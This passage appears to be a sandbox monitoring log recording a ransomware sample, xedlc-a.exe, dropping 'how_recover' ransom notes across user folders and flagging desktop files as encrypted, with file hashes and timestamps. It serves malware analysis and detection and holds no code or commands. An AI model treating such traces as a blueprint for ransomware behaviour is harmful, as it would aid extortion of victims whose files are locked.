- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778430
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90332
- mode: close
- sequenceNumber: 1576
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778430
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90339
- mode: created
- sequenceNumber: 1577
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778431
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90345
- mode: close
- sequenceNumber: 1578
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778431
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90353
- mode: created
- sequenceNumber: 1579
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778432
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90359
- mode: close
- sequenceNumber: 1580
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778432
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90411
- mode: created
- sequenceNumber: 1581
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778433
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90417
- mode: close
- sequenceNumber: 1582
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778433
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90424
- mode: created
- sequenceNumber: 1583
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778434
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90430
- mode: close
- sequenceNumber: 1584
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778434
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90438
- mode: created
- sequenceNumber: 1585
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778435
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90443
- mode: close
- sequenceNumber: 1586
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778435
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90484
- mode: created
- sequenceNumber: 1587
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778436
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90490
- mode: close
- sequenceNumber: 1588
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778436
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90499
- mode: created
- sequenceNumber: 1589
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778437
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90505
- mode: close
- sequenceNumber: 1590
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778437
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90561
- mode: created
- sequenceNumber: 1591
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778438
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90568
- mode: close
- sequenceNumber: 1592
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778438
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90576
- mode: created
- sequenceNumber: 1593
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778439
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90582
- mode: close
- sequenceNumber: 1594
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778439
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90612
- mode: created
- sequenceNumber: 1595
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778440
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90617
- mode: close
- sequenceNumber: 1596
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778440
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90625
- mode: created
- sequenceNumber: 1597
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778441
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90631
- mode: close
- sequenceNumber: 1598
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778441
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90653
- mode: created
- sequenceNumber: 1599
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778442
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90659
- mode: close
- sequenceNumber: 1600
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778442
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90669
- mode: created
- sequenceNumber: 1601
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778443
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90675
- mode: close
- sequenceNumber: 1602
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778443
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90722
- mode: created
- sequenceNumber: 1603
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778444
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90728
- mode: close
- sequenceNumber: 1604
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778444
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90736
- mode: created
- sequenceNumber: 1605
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778445
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90741
- mode: close
- sequenceNumber: 1606
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778445
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90748
- mode: created
- sequenceNumber: 1607
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778446
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90754
- mode: close
- sequenceNumber: 1608
- value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778446
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90762
- mode: created
- sequenceNumber: 1609
- value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778447
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90767
- mode: close
- sequenceNumber: 1610
- value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778447
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90774
- mode: created
- sequenceNumber: 1611
- value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778448
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90779
- mode: close
- sequenceNumber: 1612
- value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778448
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90807
- mode: created
- sequenceNumber: 1613
- value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778449
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90812
- mode: close
- sequenceNumber: 1614
- value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778449
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90846
- mode: created
- sequenceNumber: 1615
- value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778450
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90852
- mode: close
- sequenceNumber: 1616
- value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778450
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90858
- mode: created
- sequenceNumber: 1617
- value: C:\Documents and Settings\admin\Application Data\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778451
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90864
- mode: close
- sequenceNumber: 1618
- value: C:\Documents and Settings\admin\Application Data\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778451
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90870
- mode: created
- sequenceNumber: 1619
- value: C:\Documents and Settings\admin\Application Data\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778452
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90876
- mode: close
- sequenceNumber: 1620
- value: C:\Documents and Settings\admin\Application Data\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778452
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90884
- mode: created
- sequenceNumber: 1621
- value: C:\Documents and Settings\admin\Cookies\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778453
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90890
- mode: close
- sequenceNumber: 1622
- value: C:\Documents and Settings\admin\Cookies\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778453
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 90898
- mode: created
- sequenceNumber: 1623
- value: C:\Documents and Settings\admin\Cookies\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778454
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 90903
- mode: close
- sequenceNumber: 1624
- value: C:\Documents and Settings\admin\Cookies\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778454
- ntstatus: 0x0
- CreateOptions: 0x0
- Ransom:
- timestamp: 90998
- sequenceNumber: 1625
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\bUkcJj.txt
- md5sum: 6450f54ec4000d28a82dc1daaaa82680
- Ransom:
- timestamp: 91684
- sequenceNumber: 1626
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\BvVaB_o.xls
- md5sum: d610d320106d97862dce6cb0157e2c03
- Ransom:
- timestamp: 91753
- sequenceNumber: 1627
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\huKZKN.doc
- md5sum: 6bf3ede98bab0f2d6a6f38ba63d68939
- Ransom:
- timestamp: 91794
- sequenceNumber: 1628
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\liJRS.jpg
- md5sum: 980a526cf80358459ec855165596e154
- Ransom:
- timestamp: 91849
- sequenceNumber: 1629
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\SeuRdneRhX.ppt
- md5sum: 32b93875f6417c6c7ee1e62928537a79
- Ransom:
- timestamp: 91868
- sequenceNumber: 1630
- pattern: MC
- value: C:\Documents and Settings\admin\Desktop\WDntnmnTP.png
- md5sum: cd7c94a9e10cc27d80b3db781c7da310
- file:
- timestamp: 91876
- mode: created
- sequenceNumber: 1631
- value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778455
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91883
- mode: close
- sequenceNumber: 1632
- value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778455
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91891
- mode: created
- sequenceNumber: 1633
- value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778456
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91897
- mode: close
- sequenceNumber: 1634
- value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778456
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91943
- mode: created
- sequenceNumber: 1635
- value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778457
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91949
- mode: close
- sequenceNumber: 1636
- value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778457
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91957
- mode: created
- sequenceNumber: 1637
- value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778458
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91963
- mode: close
- sequenceNumber: 1638
- value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778458
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91970
- mode: created
- sequenceNumber: 1639
- value: C:\Documents and Settings\admin\Favorites\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778459
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91977
- mode: close
- sequenceNumber: 1640
- value: C:\Documents and Settings\admin\Favorites\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778459
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91983
- mode: created
- sequenceNumber: 1641
- value: C:\Documents and Settings\admin\Favorites\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778460
